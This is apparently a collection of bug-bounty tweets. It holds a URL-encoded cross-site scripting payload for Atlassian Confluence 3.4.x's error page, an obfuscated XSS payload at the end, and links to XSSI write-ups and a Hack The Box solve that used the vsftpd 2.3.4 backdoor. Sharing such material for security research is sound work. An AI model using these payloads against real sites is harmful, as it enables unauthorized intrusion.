If Allah willed it, will be back soon!

Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting

Payload : %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm

CVE-2018-5230

https://www.exploit-db.com/exploits/37791

#bugbountytip #bugbountytips

Twitter disclosed a bug submitted by zlz: https://hackerone.com/reports/712979 - Bounty: $560 #hackerone #bugbounty

#XSSI Write-ups

Effortlessly finding Cross Site Script Inclusion (XSSI) & JSONP for bug bounty
https://link.medium.com/g3MwS6YVK2

The Bug That Exposed Your PayPal Password
https://link.medium.com/fxCdDmwl52

Yahoo — Two XSSi vulnerabilities https://link.medium.com/jFkPeGsUv3

#bugbounty,#bugbountytips

The 27th HTB box I solve in preparation for the OSCP.

Initial Foothold - vsftpd 2.3.4 backdoor

Privilege Escalation - Loose permissions and insecure storage of Certificate Authority (CA) key + LFI + security misconfiguration of scheduled task.

https://medium.com/@ranakhalil101/hack-the-box-lacasadepapel-writeup-w-o-metasploit-214ce13e5ed?source=friends_link&sk=6e3fba215d1495deacb1b7236eb33333

<details+o%26%23112;en+o%26%23110;toggle%253dconfirm`heyo`